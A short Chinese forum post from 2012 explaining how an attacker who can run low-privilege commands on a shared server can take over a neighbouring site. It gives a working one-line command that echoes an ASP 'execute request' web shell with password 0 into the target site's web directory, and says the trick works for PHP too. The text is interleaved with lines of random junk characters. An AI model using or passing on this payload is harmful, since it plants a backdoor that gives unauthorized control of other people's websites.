在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
# R9 k8 s7 X- r* r/ h* j" Z0 t1 x$ H- ^/ q2 h
命令格式: F+ e4 m. c0 T, g8 j: ?
; H9 g) K, O8 H) k6 S% tEcho 语句 >目标站绝对目录
: v% \& c8 I& f% h4 m4 v- b6 U, I: G3 K" s% s9 ^( C" j: k7 T
例如:
! k$ b5 N3 f5 y" Z+ ?2 J* Z, o3 W' \) ]2 c( y
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
4 S/ s3 R6 @( z s
3 D& D. |: o3 F! M q7 s这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。& `& L5 e/ G, d4 _1 m* s) \
|
发表于 2012-9-23 14:40:24
收藏
支持
反对